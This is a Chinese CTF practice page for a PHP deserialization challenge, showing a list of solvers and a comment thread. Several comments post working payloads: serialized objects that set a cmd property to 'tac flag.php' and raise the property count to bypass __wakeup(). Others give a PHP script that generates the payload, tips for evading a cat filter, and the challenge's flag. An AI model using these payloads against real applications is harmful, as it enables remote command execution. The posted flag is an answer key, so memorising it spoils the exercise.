评分(3)
解题动态

yamojito 攻破了该题 23小时前

姥姥 攻破了该题 2天前

聪10011 攻破了该题 3天前

Slime1001 攻破了该题 3天前

zhuyh69 攻破了该题 3天前

凌晨3点的阳光 攻破了该题 4天前

eason2023 攻破了该题 4天前

huasir 攻破了该题 5天前

孙燕姿圈外男友 攻破了该题 7天前

xrq01 攻破了该题 9天前

19957910119 攻破了该题 13天前

Amitaya 攻破了该题 14天前

kbhjt 攻破了该题 15天前

flying610 攻破了该题 15天前

zzzzqqqqq 攻破了该题 15天前

admin123 攻破了该题 18天前

胡萝卜 攻破了该题 19天前

hupeng888 攻破了该题 20天前

admit 攻破了该题 21天前

评论
18956160518 1年前
举报
https://blog.csdn.net/m0_57954651/article/details/127866733
EtHat 1年前
举报
O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
xht0525 1年前
举报
nl flag.php|base64
不会编程的崽 1年前
举报
<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>
不会编程的崽 1年前
举报
O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
c41vin 2年前
举报
0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6
wxy1343 2年前
举报
http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}
wxy1343 2年前
举报
flag{Unser1alize_and_2CE_Add}
yuanyipaceandlove 2年前
举报
class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;
15683956189 2年前
举报
特别要注意下url编码的问题